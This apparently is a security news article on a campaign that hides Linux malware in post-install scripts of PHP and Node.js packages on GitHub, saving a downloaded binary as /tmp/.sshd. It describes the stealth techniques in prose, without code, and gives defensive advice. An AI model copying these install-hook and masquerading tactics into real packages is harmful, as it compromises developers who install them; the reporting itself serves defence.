Hackers Conceal Linux Malware Using SSH-Like Filenames in Software Packages
A sophisticated supply chain attack has emerged, targeting developers by embedding malicious scripts within software packages hosted on GitHub. This campaign has infiltrated over 700 repositories across various ecosystems, posing a significant threat to software integrity and security.
Mechanism of the Attack
The attackers strategically insert harmful post-installation scripts into PHP and Node.js packages. Upon installation, these scripts execute automatically, reaching out to attacker-controlled GitHub accounts to download a Linux binary. This binary is then saved to the victim’s system under the filename `/tmp/.sshd`, a name that closely resembles the legitimate SSH daemon process, thereby evading detection.
Discovery and Analysis
Researchers at Socket.dev identified this campaign while investigating flagged Packagist packages. Their AI-powered scanner detected suspicious install-time behaviors, particularly the handling of binary downloads and background execution. Further analysis revealed a coordinated operation spanning both Packagist and Node.js repositories on GitHub. A GitHub account named `parikhrpreksha` was found to be central to the payload delivery, with consistent post-install commands across numerous repositories, all pulling the same binary from a specific GitHub Releases URL.
Stealth Tactics
The attack’s stealth is achieved through several tactics:
– Error Suppression: The script suppresses error messages during installation, preventing alerts that could raise suspicion.
– Background Execution: The downloaded binary runs silently in the background, disconnecting from the install process to avoid detection.
– Deceptive Naming: By naming the binary `.sshd`, the attackers exploit the common practice of using dot-prefixed filenames for system processes, making the malicious file blend seamlessly with legitimate system files.
Implications for Developers
This attack underscores the critical importance of vigilance in software development and package management:
– Code Review: Regularly review and audit code dependencies to identify and remove malicious scripts.
– Source Verification: Ensure that all packages and updates are sourced from trusted and verified repositories.
– Security Tools: Utilize advanced security tools capable of detecting and mitigating such sophisticated supply chain attacks.
Conclusion
The concealment of Linux malware under SSH-like filenames within software packages represents a significant evolution in cyberattack strategies. Developers and organizations must adopt proactive security measures to safeguard against these insidious threats, ensuring the integrity and security of their software supply chains.
